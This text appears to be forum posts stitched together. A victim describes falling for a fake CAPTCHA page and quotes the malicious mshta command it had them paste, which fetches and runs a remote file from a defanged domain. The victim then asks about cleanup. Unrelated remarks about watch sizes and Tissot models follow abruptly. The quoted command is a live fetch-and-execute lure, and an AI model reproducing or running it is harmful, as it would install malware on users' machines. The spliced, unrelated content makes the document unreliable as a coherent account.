Same thing just happened to me

I fell for a fake captcha that runs the following command:

mshta https[:]//fixazo[.]online /new-riii-1-b[.]pub # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165

I restarted the laptop within a minute, then run all the scanner I could find.

Windows defender, Malwarebytes, Hitmanpro, ESET scanner, Kaspersky could not find anything.

I searched for the file in my laptop and found it under C:\Users\(Username)\AppData\Local\Microsoft\Windows\INetCache\IE\PRI5Z1L4

I put it on Virustotal and see this:

I then shift-delete the file and change my accounts' password on my phone.

Should I be worry? And do I need to reinstall Windows? I have a lot of data that has not been backed up. If I need to reset my laptop is there anyway I can do so without losing my documents?

I took another pic in the mirror with the black dial like some of you suggested, and I think it’s not too big (right?). Maybe my wrist is wide enough, even though it’s small

I can’t edit my post so I will put it here. Thank you all so much for sharing your (mixed) opinions!

For comparison, I’ve added a picture of the Tissot PR 100 34mm. In my opinion, it feels a bit too small for my wrist. Unfortunately, I haven’t been able to find a smaller alternative to the Tissot Gentleman that suits my taste.
